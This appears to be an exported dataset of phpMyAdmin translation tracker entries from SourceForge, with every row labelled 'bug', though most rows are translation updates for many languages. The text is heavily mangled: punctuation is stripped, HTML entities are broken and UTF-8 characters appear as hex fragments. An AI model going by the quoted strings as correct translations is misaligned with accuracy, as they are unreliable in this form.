There is a little bug in Polish translation When there is an error message there is amp;quot;... W znalezieniu przyczyny problemu mo amp;amp; 380;e pomxc3xb3 amp;amp; 263; tak amp;amp; 380;e ... amp;quot; and it shoud be amp;quot;... W znalezieniu przyczyny problemu mo amp;amp; 380;e pomxc3xb3c tak amp;amp; 380;e ... amp;quot; Best regards Mateusz [PEYN] Adamus PS I hope this is the right place for that kind of posts ) Original URL https sourceforge.net p phpmyadmin translations 390 https sourceforge.net p phpmyadmin translations 390 Original author anonymous","bug"
"24444","3422","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 391 https sourceforge.net p phpmyadmin translations 391 Original author danone","bug"
"24444","3423","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 392 https sourceforge.net p phpmyadmin translations 392 Original author danone","bug"
"24444","3424","Norwegian update.
Updated Norwegian language file.
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 393 https sourceforge.net p phpmyadmin translations 393 Original author sven erik","bug"
"24444","3425","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 394 https sourceforge.net p phpmyadmin translations 394 Original author ubanus","bug"
"24444","3426","Bulgarian update.
Bulgarian update, windows 1251, version 1.94 Original URL https sourceforge.net p phpmyadmin translations 395 https sourceforge.net p phpmyadmin translations 395 Original author stanprog","bug"
"24444","3427","Updated Chinese gb and utf 8. grabbed from webcvs.
Original URL https sourceforge.net p phpmyadmin translations 396 https sourceforge.net p phpmyadmin translations 396 Original author fundawang","bug"
"24444","3428","wrong translation in spanish.
well first of all, i dont if this is the proper place for reporting about language bugs i dont see any report of so around ...) ; well, this is in phpmyadmin 2.4.0 when trying to export a DB .. at the page where tables are selected, and which info data and structure for example) to export, below there are some check box with settings .. and the last one refers in english as save as file , though in spanish translation it is currently as enviar send), so i think it would be more clear to translate as guardar como fichero Original URL https sourceforge.net p phpmyadmin translations 397 https sourceforge.net p phpmyadmin translations 397 Original author zaldun","bug"
"24444","3429","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 398 https sourceforge.net p phpmyadmin translations 398 Original author danone","bug"
"24444","3430","Swedish.
Swedish translation of new strings for 2.5.2 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 399 https sourceforge.net p phpmyadmin translations 399 Original author bth","bug"
"24444","3431","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 400 https sourceforge.net p phpmyadmin translations 400 Original author ubanus","bug"
"24444","3432","Swedish.
Swedish translation of strAccessDeniedExplanation Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 401 https sourceforge.net p phpmyadmin translations 401 Original author bth","bug"
"24444","3433","Updated indonesian translation.
Updated indonesian translation for 2.5.2 Original URL https sourceforge.net p phpmyadmin translations 402 https sourceforge.net p phpmyadmin translations 402 Original author tamsy","bug"
"24444","3434","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 403 https sourceforge.net p phpmyadmin translations 403 Original author danone","bug"
"24444","3435","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 404 https sourceforge.net p phpmyadmin translations 404 Original author ubanus","bug"
"24444","3436","Chinese BIG5 Update.
updated.
Original URL https sourceforge.net p phpmyadmin translations 405 https sourceforge.net p phpmyadmin translations 405 Original author siusun","bug"
"24444","3437","Swedish.
Swedish translation of strAddAutoIncrement Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 406 https sourceforge.net p phpmyadmin translations 406 Original author bth","bug"
"24444","3438","slovak translation update.
hi, here is latest slovak translation update iso 8859 2).
bye.
Original URL https sourceforge.net p phpmyadmin translations 407 https sourceforge.net p phpmyadmin translations 407 Original author erkac","bug"
"24444","3439","Latest indonesian translation.
Latest indonesian translation Michal Cihar s e mail) Original URL https sourceforge.net p phpmyadmin translations 408 https sourceforge.net p phpmyadmin translations 408 Original author tamsy","bug"
"24444","3440","Translations for 2.5.2 Spanish.
As requested, All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 409 https sourceforge.net p phpmyadmin translations 409 Original author dhinostroza","bug"
"24444","3441","Chinese BIG5 Update.
added strAddAutoIncrement Original URL https sourceforge.net p phpmyadmin translations 410 https sourceforge.net p phpmyadmin translations 410 Original author siusun","bug"
"24444","3442","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 411 https sourceforge.net p phpmyadmin translations 411 Original author danone","bug"
"24444","3443","Brazilian Version.
Guys, I d like to translate to Portuguese Brazilian, I need their help.
Original URL https sourceforge.net p phpmyadmin translations 413 https sourceforge.net p phpmyadmin translations 413 Original author lsobral","bug"
"24444","3444","slovak translation update.
hi, here is translation update for strAddAutoIncrement bye Original URL https sourceforge.net p phpmyadmin translations 412 https sourceforge.net p phpmyadmin translations 412 Original author erkac","bug"
"24444","3445","Estonian language update.
New translations Original URL https sourceforge.net p phpmyadmin translations 414 https sourceforge.net p phpmyadmin translations 414 Original author finsoft","bug"
"24444","3446","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 415 https sourceforge.net p phpmyadmin translations 415 Original author ubanus","bug"
"24444","3447","Catalan Update.
Catalan Update from the lastest CVS Original URL https sourceforge.net p phpmyadmin translations 416 https sourceforge.net p phpmyadmin translations 416 Original author xavin","bug"
"24444","3448","Estonian language update.
One new string Original URL https sourceforge.net p phpmyadmin translations 417 https sourceforge.net p phpmyadmin translations 417 Original author finsoft","bug"
"24444","3449","Complete serbian windows 1250 translation.
Complete serbian windows 1250 translation with all messages translated, lots of spelling errors corrected and added serbian accented letters where missing.
Latest CSV version v 1.97 2003 07 23 19 38 39 rabus) used as reference.
Some changes from other translations by banej) included.
UTF 8 and serbian cyrillic version soon to follow.
Original URL https sourceforge.net p phpmyadmin translations 418 https sourceforge.net p phpmyadmin translations 418 Original author mikis","bug"
"24444","3450","Complete Serbian Cyrillic translation UTF 8 and Win 1251).
Complete Serbian Cyrillic translation, in UTF 8 and Windows 1251 code page.
All messages translated, lots of spelling errors corrected.
Latest CSV version v 1.97 2003 07 23 19 38 39 rabus) used as reference.
Some changes from other translations by banej) included.
Original URL https sourceforge.net p phpmyadmin translations 419 https sourceforge.net p phpmyadmin translations 419 Original author mikis","bug"
"24444","3451","Update for spanish 2.5.3.
Hi, I wasn t able to translate amp;quot;Collation amp;quot; as I did not quite understand what it means to phpMyAdmin.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 420 https sourceforge.net p phpmyadmin translations 420 Original author dhinostroza","bug"
"24444","3452","New catalan messages for 2.5.3.
Zipped new catalan messages for 2.5.3 Original URL https sourceforge.net p phpmyadmin translations 421 https sourceforge.net p phpmyadmin translations 421 Original author xavin","bug"
"24444","3453","Serbian translations update for 2.5.3.
More Serbian translations corrections and spelling errors fixed.
Both cyrillic win 1251) and latin win 1250) versions included.
Latest version CVS 2.5.3 rc1) used as reference.
Original URL https sourceforge.net p phpmyadmin translations 422 https sourceforge.net p phpmyadmin translations 422 Original author mikis","bug"
"24444","3454","[Phpmyadmin translators] for 2.5.3 Galician.
[Phpmyadmin translators] for 2.5.3 Galician Original URL https sourceforge.net p phpmyadmin translations 424 https sourceforge.net p phpmyadmin translations 424 Original author xosecalvo","bug"
"24444","3455","Romanian.
strCharsets = Set de caractere ; strDescription = Descriere ; strCharsetsAndCollations = Set de caractere si gestionarea acestora ; strCollation = Gestionare ; strMultilingual = Poliglot ; strGerman = German ; strPhoneBook = carte de telefoane ; strDictionary = dictionar ; strSwedish = Suedez ; strDanish = Danez ; strCzech = Ceh ; strTurkish = Turc ; strEnglish = Englez ; strHungarian = Unguresc ; strCroatian = Croat ; strBulgarian = Bulgar ; strLithuanian = Lituanian ; strEstonian = Estonian ; strCaseInsensitive = caz insenzitiv ; strCaseSensitive = caz senzitiv ; strUkrainian = Ukrainian ; Original URL https sourceforge.net p phpmyadmin translations 423 https sourceforge.net p phpmyadmin translations 423 Original author lvalics","bug"
"24444","3456","Spanish update for 2.5.3 collations.
Thanks for the link to MySQL.
Here are the translations.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 425 https sourceforge.net p phpmyadmin translations 425 Original author dhinostroza","bug"
"24444","3457","Updated chinese gb translation.
Applied 08 01.
Original URL https sourceforge.net p phpmyadmin translations 426 https sourceforge.net p phpmyadmin translations 426 Original author fundawang","bug"
"24444","3458","Swedish for 2.5.3.
Swedish translation of new strings for 2.5.3 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 427 https sourceforge.net p phpmyadmin translations 427 Original author bth","bug"
"24444","3459","Bulgarian translation update.
bulgarian windows 1251.inc.php3,v 1.103 2003 08 01 00 09 27 Original URL https sourceforge.net p phpmyadmin translations 428 https sourceforge.net p phpmyadmin translations 428 Original author stanprog","bug"
"24444","3460","[Phpmyadmin translators] for 2.5.3, part 2 Galician.
strHebrew = Hebreu ; strWestEuropean = Europeu ocidental ; strCentralEuropean = Centroeuropeu ; strTraditionalChinese = Chinxc3xa9s tradicional ; strCyrillic = Cirxc3xadlico ; strArmenian = Armenio ; strArabic = xc3x81rabe ; strRussian = Ruso ; strUnknown = descoxc5x84ecido ; strBaltic = Bxc3xa1ltico ; strUnicode = Unicode ; strSimplifiedChinese = Chinxc3xa9s simplificado ; strKorean = Coreano ; strGreek = Grego ; strJapanese = Xaponxc3xa9s ; strThai = Tailandxc3xa9s ; Original URL https sourceforge.net p phpmyadmin translations 429 https sourceforge.net p phpmyadmin translations 429 Original author xosecalvo","bug"
"24444","3461","new translation.
new lithuanian translation.
Translated new strings, updated old strings varying from users opinions.
Original URL https sourceforge.net p phpmyadmin translations 430 https sourceforge.net p phpmyadmin translations 430 Original author viliusz","bug"
"24444","3462","Small error in English language file.
It seems that two values in English language file are reversed english iso 8859 1.inc.php3,v 1.119, lines 150 and 151) strDBGMaxTimeMs = Min time, ms ; strDBGMinTimeMs = Max time, ms ; should be strDBGMaxTimeMs = Max time, ms ; strDBGMinTimeMs = Min time, ms ; Original URL https sourceforge.net p phpmyadmin translations 431 https sourceforge.net p phpmyadmin translations 431 Original author mikis","bug"
"24444","3463","Catalan update for 2.5.3 part 2.
Catalan messages updated for 2.5.3 part 2 Original URL https sourceforge.net p phpmyadmin translations 432 https sourceforge.net p phpmyadmin translations 432 Original author xavin","bug"
"24444","3464","polish.
polish update Original URL https sourceforge.net p phpmyadmin translations 433 https sourceforge.net p phpmyadmin translations 433 Original author ubanus","bug"
"24444","3465","Polish documentation.
I have traslated whole Documentation.html into Polish.
Here is the file for PMA 2.5.2 http strony.kopernik.mielec.pl ubanus pmadoc D2.5.2 Documentation pl 2.5.2 1.html.gz Translation of the current CVS version should be available soon.
Original URL https sourceforge.net p phpmyadmin translations 434 https sourceforge.net p phpmyadmin translations 434 Original author ubanus","bug"
"24444","3466","slovak.
slovak translation update Original URL https sourceforge.net p phpmyadmin translations 435 https sourceforge.net p phpmyadmin translations 435 Original author erkac","bug"
"24444","3467","Spanish update for 2.5.3.
I had to translate again as I had already erased my file.
Anyway, some corrections have also been made to the file.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 436 https sourceforge.net p phpmyadmin translations 436 Original author dhinostroza","bug"
"24444","3468","Chinese BIG5 Update [FIX].
thx Original URL https sourceforge.net p phpmyadmin translations 437 https sourceforge.net p phpmyadmin translations 437 Original author siusun","bug"
"24444","3469","Lastest catalan messages.
Lastest catalan messages translated from Marc Delisle e mail Original URL https sourceforge.net p phpmyadmin translations 438 https sourceforge.net p phpmyadmin translations 438 Original author xavin","bug"
"24444","3470","Serbian 3 new messages for 2.5.3.
Translated 3 new messages browse and choose values from a foreign table) for 2.5.3 Original URL https sourceforge.net p phpmyadmin translations 439 https sourceforge.net p phpmyadmin translations 439 Original author mikis","bug"
"24444","3471","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 440 https sourceforge.net p phpmyadmin translations 440 Original author danone","bug"
"24444","3472","Updated indonesian translation.
Updated indonesian translation CVS 19 08 03) Original URL https sourceforge.net p phpmyadmin translations 441 https sourceforge.net p phpmyadmin translations 441 Original author tamsy","bug"
"24444","3473","polish.
polish update Original URL https sourceforge.net p phpmyadmin translations 442 https sourceforge.net p phpmyadmin translations 442 Original author ubanus","bug"
"24444","3474","Swedish for 2.5.3.
Swedish translation of new strings for 2.5.3 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 443 https sourceforge.net p phpmyadmin translations 443 Original author bth","bug"
"24444","3475","Updated Greek translation.
Hi guys sorry it s been so long since I last updated the translation, but lots of stuff have been happening in my life including a new baby ).
Anyway here s the translated file.
There are some stuff missing 3 or 4 if I remember correctly.
But it s most likely that by the time the final version will be out, I ll have them sorted out.
A couple of notes 1\.
I couldn t do the utf 8 file.
Sorry about that \ 2\.
I didn t move the translated stuff to their alphabetic section so that you know what happened.
If you want me to do it, drop me a line and I ll have it ready by the time I send you the next version of the file.
That s all ) And most importantly, thank you for making phpMyAdmin such an awesome tool.
It has come a long way since I first saw it and right now it s a dream come true!
Thank you guys ) Original URL https sourceforge.net p phpmyadmin translations 444 https sourceforge.net p phpmyadmin translations 444 Original author theremon","bug"
"24444","3476","Spanish update for 2.5.3.
Here it goes strUseThisValue = Use este valor ; strWindowNotFound = La ventana del navegador no pudo actualizarse.
Quizxc3xa1 cerrxc3xb3 la ventana principal o su navegador estxc3xa1 bloqueando las actualizaciones en ventanas mxc3xbaltiples debido a sus parxc3xa1metros de seguridad.
strBrowseForeignValues = Muestre los valores extranjeros ; All the very best, Daniel Hi, 2.5.3 is scheduled for August 31st.
Thanks.
A new feature was lately added just before 2.5.3 rc2 to browseb and choose values from a foreign table.
Marc strUseThisValue = Use this value ; strWindowNotFound = The target browser window could not be updated.
Maybe you have closed the parent window or your browser is blocking cross window updates of your security settings ; strBrowseForeignValues = Browse foreign values ; Original URL https sourceforge.net p phpmyadmin translations 445 https sourceforge.net p phpmyadmin translations 445 Original author dhinostroza","bug"
"24444","3477","Azerbaijani version of PHPMyAdmin.
We would like to translate phpMyAdmin into Azerbaijani small country on the western coast of Caspian Sea, Caucasus).
We have professional php knowlegde and are ruling portal created upon this technology at http www.tombraidercommunity.com Please contact us via support trcomm.net Regards, TRComm Staff Original URL https sourceforge.net p phpmyadmin translations 446 https sourceforge.net p phpmyadmin translations 446 Original author anonymous","bug"
"24444","3478","Estonian language update.
New strings Original URL https sourceforge.net p phpmyadmin translations 447 https sourceforge.net p phpmyadmin translations 447 Original author finsoft","bug"
"24444","3479","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 448 https sourceforge.net p phpmyadmin translations 448 Original author danone","bug"
"24444","3480","Latest Dutch Translation.
Hi everyone, Been a while since i updated g been very busy anyway here s the new list strUpdComTab = Raadpleeg de Documentatie over hoe u uw Column comments tabel bijwerkt.
; strAutomaticLayout = Automatische lay out ; strCSVOptions = CSV opties ; strDBComment = Database commentaar ; strDelOld = De huidige pagina heeft referenties met tabellen die niet langer bestaan.
Wilt u deze referenties verwijderen?
; strDumpComments = Voeg column comments in als inline SQL comments ; strFileNameTemplate = File naam template ; strFileNameTemplateHelp = Gebruik DB voor de database naam, TABLE voor tabel naam en sany strftime s opties voor tijd specificaties, extensies zullen automatisch worden bijgevoegd.
Elke andere tekst zal worden bewaard.
; strFileNameTemplateRemember = Onthoud template ; strInnodbStat = InnoDB Status ; strMIME MIMEtype = MIME type ; strMIME available mime = Beschikbare MIME types ; strMIME available transform = Beschikbare transformaties ; strMIME description = Beschrijving ; strMIME file = Filenaam ; strMIME nodescription = Geen beschrijving beschikbaar voor deze transformatie.
amp;lt;br amp;gt;Raadpleeg de maker over wat s doet.
; strMIME transformation = Browser transformaties ; strMIME transformation note = Voor een lijst met beschikbare transformatie opties en MIME type transformaties, klik op sTransformatie opties s ; strMIME transformation options = Transformatie opties ; strMIME transformation options note = Voeg de waardes voor transformatie optie in het volgende formaat in \ a\ ,\ b\ ,\ c\ ... amp;lt;br amp;gt;Wanneer u een backslash amp;quot;\ amp;quot;) of een enkele quote amp;quot;\ amp;quot;) moet invoegen in deze waardes, backslashes het dan bijvoorbeeld \ \\\\xyz\ of \ a\\\ b\ ).
; strMIME without = MIME types die in italics staan Schuin) hebben geen aparte transformatie functies ; strNoOptions = Dit format heeft geen opties ; strPerMinute = per minuut ; strPerSecond = per seconde ; strQueryFrame = Query window ; strQueryFrameDebug = Debugging informatie ; strQueryFrameDebugBox = Actieve variabelen voor het formaat van de query \nDB s\nTabel s\nServer s\n\nHuidige variabelen voor het formaat van de query \nDB s\nTabel s\nServer s\n\nOpener locatie s\nFrameset locatie s. ; strQuerySQLHistory = SQL geschiedenis ; strQueryTime = Query duurde 01.4f sec ; strRowsModeFlippedHorizontal = horizontaal rotated headers) ; strSQLOptions = SQL opties ; strStatCheckTime = Laatst gecontroleerd ; strStatCreateTime = Gecrexc3xaberd ; strStatUpdateTime = Laatst bijgewerkt ; strTransformation image jpeg inline = Toont een klik bare thumbnail; opties width,height in pixels houdt de originele ratio) ; strTransformation image jpeg link = Toont een link naar deze image directe blob download, i.e.).
; strTransformation image png inline = Zie image jpeg inline ; strTransformation text plain dateformat = Neemt een TIME, TIMESTAMP of DATETIME veld en vormt het naar uw lokale datumformaat.
Eerst optie is de offset in uren) welke zal worden toegevoegd aan de timestamp Default 0).
De tweede opties is een ander datumformaat volgens de parameters beschikbaar volgens PHPs strftime ).
; strTransformation text plain external = ALLEEN LINUX Lanceert een externe applicatie en voed het de veld data via standaard input.
Geeft standaard output van de applicatie terug.
Default is Netjes, om nette HTML code te tonen.
Om beveiligings redenen zult u handmatig het bestand libraries transformations text plain external.inc.php moeten aanpassen en de tools die u mag draaien invoegen.
De eerste opties is het nummer van het programma wat u wilt gebruiken, de tweede optie zijn de parameters voor dit programma.
Het derde parameter, wanneer ingesteld op 1, zal de output omzetten door middel van htmlspecialchars ) Standaard is 1).
Een vierde parameter, wanneer ingesteld als 1 zal NOWRAQP aan de content cell toevoegen, zodat de gehele output getoond zal worden zonder te herstructureren Standaard 1) ; strTransformation text plain formatted = Preserveert het originele formaat van het veld.
Er wordt geen Escaping toegepast.
; strTransformation text plain substr = Toont alleen een stuk van een string.
De eerst optie is een offset om te bepalen waar de output van uw tekst start Standaard 0).
De tweede optie is een offset van de hoeveel tekst die terug wordt gegeven.
Wanneer leeg, zal het alle overgebleven tekst teruggeven.
De derde optie defineerd welke karakters worden toegevoegd aan de output wanneer een substring wordt teruggegeven Standaard ...) .
; strTransformation text plain unformatted = Toont HTML code als HTML entities.
Er wordt geen HTML formatting getoond.
; strXML = XML ; strAutodetect = Auto detectie ; strTransformation text plain imagelink = Toont een plaatje en een link, het veld bevat de bestandsnaam; De eerste optie is een prefix als amp;quot;http domein.com amp;quot;, de tweede optie is de breedte in pixels, de derde is de hoogte.
; strTransformation text plain link = Toont een link, het veld bevat de bestandsnaam; De eerste optie is een prefix als amp;quot;http domein.com amp;quot;, de tweede optie is de titel voor de link.
; strUseHostTable = Gebruik Host Tabel ; strShowFullQueries = Toon volledige Queries ; strTruncateQueries = Truncate getoonde Queries ; strSwitchToTable = Wissel naar de gekopieerde tabel ; strCharset = Karakterset ;e strLaTeXOptions = LaTeX opties ; strRelations = Relaties ; strMoveTableSameNames = Kan de tabel niet naar dezelfde verplaatsen!
; strCopyTableSameNames = Kan de tabel niet naar dezelfde kopixc3xabren!
; strMustSelectFile = U moet een bestand selecteren welke u wilt invoegen.
; strSaveOnServer = Bewaar op de server in s directory ; strOverwriteExisting = Overschrijf bestaande bestand en) ; strFileAlreadyExists = Bestaand s bestaat al op de server, verander de bestandsnaam of controleer overschrijf opties.
; strDumpSaved = Dump is bewaard als s. ; strNoPermission = De web server heeft geen rechten om het bestand s op te slaan.
; strNoSpace = Onvoldoende ruimte om het bestand s op te slaan.
; strInsertedRowId = Ingevoegde rij id ; strLoadMethod = LOAD methode ; strLoadExplanation = De beste methode is aan gevinkt standaard maar u kunt dit veranderen mocht het niet lukken.
; strExecuteBookmarked = Voor de gebookmarkte query uit ; strExcelOptions = Excel opties ; strReplaceNULLBy = Vervang NULL door ; strQueryWindowLock = Overschrijf deze query niet van buitenaf dit scherm ; strPaperSize = Papier grootte ; strDatabaseNoTable = Deze database bevat geen tabel!
; strViewDumpDatabases = Bekijk dump schema) van de databases ; strAddIntoComments = Voeg toe in commentaar ; strDatabaseExportOptions = Database export opties ; strAddDropDatabase = Voeg DROP DATABASE toe ; strToggleScratchboard = toggle scratchboard ; strTableOptions = Tabel opties ; strSecretRequired = Het configuratie bestand heeft nu een geheime wachtwoord zin nodig blowfish secret).
; strAccessDeniedExplanation = phpMyAdmin probeerde met de MySQL server te verbinden maar de server weigerde de verbinding.
Controleer de host, de gebruikersnaam en het wachtwoord in config.inc.php en zorg er voor dat deze overeenkomen met de informatie die u van de Beheerder van de MySQL server kreeg.
; strAddAutoIncrement = Voeg AUTO INCREMENT waarde toe ; strCharsets = Karaktersets ; strDescription = Beschrijving ; strCharsetsAndCollations = Karakter Sets en Collations ; strCollation = Collation ; strMultilingual = multilingual ; strGerman = Duits ; strPhoneBook = Telefoonboek ; strDictionary = Woordenboek ; strSwedish = Zweeds ; strDanish = Deens ; strCzech = Tsjechisch ; strTurkish = Turks ; strEnglish = Engels ; strHungarian = Hongaars ; strCroatian = Croaties ; strBulgarian = Bulgaars ; strLithuanian = Lithuanian ; strEstonian = Estonian ; strCaseInsensitive = hoofdletter ongevoelig ; strCaseSensitive = hoofdletter gevoelig ; strUkrainian = Ukrainian ; strHebrew = Hebreeuws ; strWestEuropean = West Europees ; strCentralEuropean = Centraal Europees ; strTraditionalChinese = Traditioneel Chinees ; strCyrillic = Cyrillic ; strArmenian = Armenian ; strArabic = Arabisch ; strRussian = Russisch ; strUnknown = onbekend ; strBaltic = Baltisch ; strUnicode = Unicode ; strSimplifiedChinese = Vereenvoudigd Chinese ; to translate strKorean = Koreaans ; strGreek = Grieks ; strJapanese = Japans ; strThai = Thais ; strUseThisValue = Gebruik deze waarde ; strWindowNotFound = Het doel browser scherm kon niet worden bijgewerkt.
Misschien heeft u het scherm gesloten of uw browser blokkeert bijwerkingen van uw browser beveiliging ; strBrowseForeignValues = Bekijk vreemde waardes ; strInternalRelations = Interne relaties ; strInternalNotNecessary = Een interne relatie is niet nodig wanneer er ook een InnoDB aanwezig is.
; strUpgradeMySQL = U moet opwaarderen naar MySQL s of hoger.
; strLatexStructure = Structuur van de tabel TABLE ; strLatexContinued = vervolgd) ; strLatexContent = Content van tabel TABLE ; strLatexIncludeCaption = Voeg tabel caption toe ; strLatexCaption = Tabel caption ; strLatexLabel = Label sleutel ; strLatexContinuedCaption = Vervolgde tabel caption ; strPrintViewFull = Print overzicht met volledige teksten) ; Original URL https sourceforge.net p phpmyadmin translations 449 https sourceforge.net p phpmyadmin translations 449 Original author anonymous","bug"
"24444","3481","Updated indonesian translation.
Updated indonesian translation CVS 08 09 03) Original URL https sourceforge.net p phpmyadmin translations 450 https sourceforge.net p phpmyadmin translations 450 Original author tamsy","bug"
"24444","3482","polish.
polish update Original URL https sourceforge.net p phpmyadmin translations 451 https sourceforge.net p phpmyadmin translations 451 Original author ubanus","bug"
"24444","3483","Catalan update for 2.5.4 rc1.
Catalan update for 2.5.4 rc1 Original URL https sourceforge.net p phpmyadmin translations 452 https sourceforge.net p phpmyadmin translations 452 Original author xavin","bug"
"24444","3484","Spanish update for 2.5.4rc1.
As requested.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 453 https sourceforge.net p phpmyadmin translations 453 Original author dhinostroza","bug"
"24444","3485","Updated indonesian.
Updated indonesian translation plus language cleanup Original URL https sourceforge.net p phpmyadmin translations 454 https sourceforge.net p phpmyadmin translations 454 Original author anonymous","bug"
"24444","3486","Chinese BIG5 UPDATE.
update Original URL https sourceforge.net p phpmyadmin translations 455 https sourceforge.net p phpmyadmin translations 455 Original author siusun","bug"
"24444","3487","Updated Albanian file.
Updated Albanian translation UTF 8) Original URL https sourceforge.net p phpmyadmin translations 456 https sourceforge.net p phpmyadmin translations 456 Original author laurenti","bug"
"24444","3488","Updated Norwegian translation.
Sorry about the delay in getting out the updates.
But finaly it is here... Sven Erik Original URL https sourceforge.net p phpmyadmin translations 457 https sourceforge.net p phpmyadmin translations 457 Original author sven erik","bug"
"24444","3489","Updated Slovenian translation.
Updated Slovenian translation Original URL https sourceforge.net p phpmyadmin translations 458 https sourceforge.net p phpmyadmin translations 458 Original author urosh","bug"
"24444","3490","Russian translation.
Russian translation for the last version.
Charsets win 1251, dos 866, koi8 r. Original URL https sourceforge.net p phpmyadmin translations 459 https sourceforge.net p phpmyadmin translations 459 Original author tyomych","bug"
"24444","3491","slovak translation.
slovak translation update, charset iso8859 2.
Original URL https sourceforge.net p phpmyadmin translations 460 https sourceforge.net p phpmyadmin translations 460 Original author erkac","bug"
"24444","3492","Persian translation.
The UTF 8 charset of of Persian language translation is broken.
Original URL https sourceforge.net p phpmyadmin translations 461 https sourceforge.net p phpmyadmin translations 461 Original author anonymous","bug"
"24444","3493","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 462 https sourceforge.net p phpmyadmin translations 462 Original author danone","bug"
"24444","3494","Serbian update for 2.5.4 rc2.
Serbian translation update for 2.5.4 rc2, everything translated, some spelling errors fixed.
Both cyrillic and latin versions.
Original URL https sourceforge.net p phpmyadmin translations 463 https sourceforge.net p phpmyadmin translations 463 Original author mikis","bug"
"24444","3495","Swedish for 2.5.4.
Here is the Swedish translation of messages for 2.5.4 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 464 https sourceforge.net p phpmyadmin translations 464 Original author bjornth","bug"
"24444","3496","Lithuanian windows 1257).
Lithuanian windows 1257) translation for pma 2.5.4 Original URL https sourceforge.net p phpmyadmin translations 465 https sourceforge.net p phpmyadmin translations 465 Original author viliusz","bug"
"24444","3497","Arabic Translation Update for 2.5.3.
Update of the Arabic translation done a while ago.
Sorry for being late to send it.
Original URL https sourceforge.net p phpmyadmin translations 466 https sourceforge.net p phpmyadmin translations 466 Original author okhayat","bug"
"24444","3498","Terms translated to Arabic.
strCharsets = xd8xa7xd9x84xd9x85xd8xadxd8xa7xd8xb1xd9x81 ; strDescription = xd8xa7xd9x84xd9x88xd8xb5xd9x81 ; strCharsetsAndCollations = Character Sets and Collations ; strCollation = xd8xa7xd9x84xd8xaaxd8xb1xd8xaaxd9x8axd8xa8xd8xa7xd8xaa ; strMultilingual = xd8xaaxd8xb9xd8xafxd8xaf xd8xa7xd9x84xd9x84xd8xbaxd8xa7xd8xaa ; strGerman = xd8xa7xd9x84xd8xa3xd9x84xd9x85xd8xa7xd9x86xd9x8axd8xa9 ; strPhoneBook = xd8xafxd9x84xd9x8axd9x84 xd8xa7xd9x84xd9x87xd8xa7xd8xaaxd9x81 ; strDictionary = xd8xa7xd9x84xd8xafxd9x84xd9x8axd9x84 ; strSwedish = xd8xa7xd9x84xd8xb3xd9x88xd9x8axd8xafxd9x8axd8xa9 ; strDanish = xd8xa7xd9x84xd8xafxd8xa7xd9x86xd9x85xd8xb1xd9x83xd9x8axd8xa9 ; strCzech = xd8xa7xd9x84xd8xaaxd8xb4xd9x8axd9x83xd9x8axd8xa9 ; strTurkish = xd8xa7xd9x84xd8xaaxd8xb1xd9x83xd9x8axd8xa9 ; strEnglish = xd8xa7xd9x84xd8xa5xd9x86xd8xacxd9x84xd9x8axd8xb2xd9x8axd8xa9 ; strHungarian = xd8xa7xd9x84xd9x87xd9x86xd8xbaxd8xa7xd8xb1xd9x8axd8xa9 ; strCroatian = xd8xa7xd9x84xd9x83xd8xb1xd9x88xd8xa7xd8xaaxd9x8axd8xa9 ; strBulgarian = xd8xa7xd9x84xd8xa8xd9x84xd8xbaxd8xa7xd8xb1xd9x8axd8xa9 ; strLithuanian = xd8xa7xd9x84xd9x84xd9x8axd8xaaxd9x88xd8xa7xd9x86xd9x8axd8xa9 ; strEstonian = xd8xa7xd9x84xd8xa5xd8xb3xd8xaaxd9x88xd9x86xd9x8axd8xa9 ; strCaseInsensitive = xd8xbaxd9x8axd8xb1 xd8xadxd8xb3xd8xa7xd8xb3 xd9x84xd9x88xd8xb6xd8xb9 xd8xa7xd9x84xd8xa3xd8xadxd8xb1xd9x81 ; strCaseSensitive = xd8xadxd8xb3xd8xa7xd8xb3 xd9x84xd9x88xd8xb6xd8xb9 xd8xa7xd9x84xd8xa3xd8xadxd8xb1xd9x81 ; strUkrainian = xd8xa7xd9x84xd8xa3xd9x83xd8xb1xd8xa7xd9x86xd9x8axd8xa9 ; strArabic = xd8xa7xd9x84xd8xb9xd8xb1xd8xa8xd9x8axd8xa9 ; I added the last one, if needed ) Original URL https sourceforge.net p phpmyadmin translations 467 https sourceforge.net p phpmyadmin translations 467 Original author okhayat","bug"
"24444","3499","Updated norwegian translation.
Updated norwegian translation based on norwegian iso 8859 1.inc.php3 CVS version 1.131.
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 468 https sourceforge.net p phpmyadmin translations 468 Original author sven erik","bug"
"24444","3500","Estonian language update.
New translations, some grammatic errors fixed Original URL https sourceforge.net p phpmyadmin translations 469 https sourceforge.net p phpmyadmin translations 469 Original author finsoft","bug"
"24444","3501","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 470 https sourceforge.net p phpmyadmin translations 470 Original author danone","bug"
"24444","3502","Updated Norwegian translation.
Updated Norwegian translation with the new strings for v2.5.5.
Original URL https sourceforge.net p phpmyadmin translations 471 https sourceforge.net p phpmyadmin translations 471 Original author sven erik","bug"
"24444","3503","Catalan messages for 2.5.5.
Catalan messages for 2.5.5 Original URL https sourceforge.net p phpmyadmin translations 472 https sourceforge.net p phpmyadmin translations 472 Original author xavin","bug"
"24444","3504","Chinese BIG5 UPDATE.
update Original URL https sourceforge.net p phpmyadmin translations 473 https sourceforge.net p phpmyadmin translations 473 Original author siusun","bug"
